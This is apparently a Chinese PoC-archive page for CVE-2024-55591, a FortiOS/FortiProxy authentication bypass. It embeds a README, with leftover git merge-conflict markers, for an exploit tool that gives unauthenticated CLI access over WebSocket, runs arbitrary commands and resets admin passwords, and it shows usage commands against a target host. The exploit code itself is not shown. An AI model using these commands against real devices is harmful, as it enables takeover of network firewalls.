关联漏洞
标题:
Fortinet FortiOS和FortiProxy 安全漏洞
(CVE-2024-55591)
描述:Fortinet FortiOS和Fortinet FortiProxy都是美国飞塔(Fortinet)公司的产品。Fortinet FortiOS是一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。Fortinet FortiProxy是一种安全的网络代理,通过结合多种检测技术,如Web过滤、DNS过滤、DLP、反病毒、入侵防御和高级威胁保护,可以保护员工免受网络攻击。FortiProxy有助于减
介绍
<<<<<<< HEAD
# CVE-2024-55591-POC
=======
# CVE-2024-55591 – FortiOS WebSocket CLI Auth Bypass (PoC)
This is a Proof-of-Concept (PoC) tool for exploiting **CVE-2024-55591**, a vulnerability in FortiOS that allows unauthenticated access to the CLI over WebSocket.
## Features
- Automatic detection of FortiOS GUI and vulnerability status
- Execute arbitrary CLI commands via WebSocket
- Interactive shell interface
- Admin password reset functionality (`--reset-user`)
- SSL support
## Usage
### Basic interactive mode:
```bash
python3 poc.py --host <target_ip> --port 443 --ssl
```
Then use the prompt:
```
FortiOS# get system status
FortiOS# exit
```
### Reset admin password:
```bash
python3 poc.py --host <target_ip> --port 443 --ssl \
--reset-user Admin2 --new-pass Forti2024!
```
## Developer
- Telegram: [@cherny_zhizn](https://t.me/cherny_zhizn)
---
**Disclaimer:** This tool is provided for educational and authorized testing purposes only.
>>>>>>> 4fe5de8 (Add full PoC and README for CVE-2024-55591 by @cherny_zhizn)
文件快照
[4.0K] /data/pocs/781e843d45baa2c9db1a41fbe4052a3f1516a9dc
├── [6.3K] CVE 2024 55591 PoC.py
├── [1.2K] LICENSE
└── [1.0K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。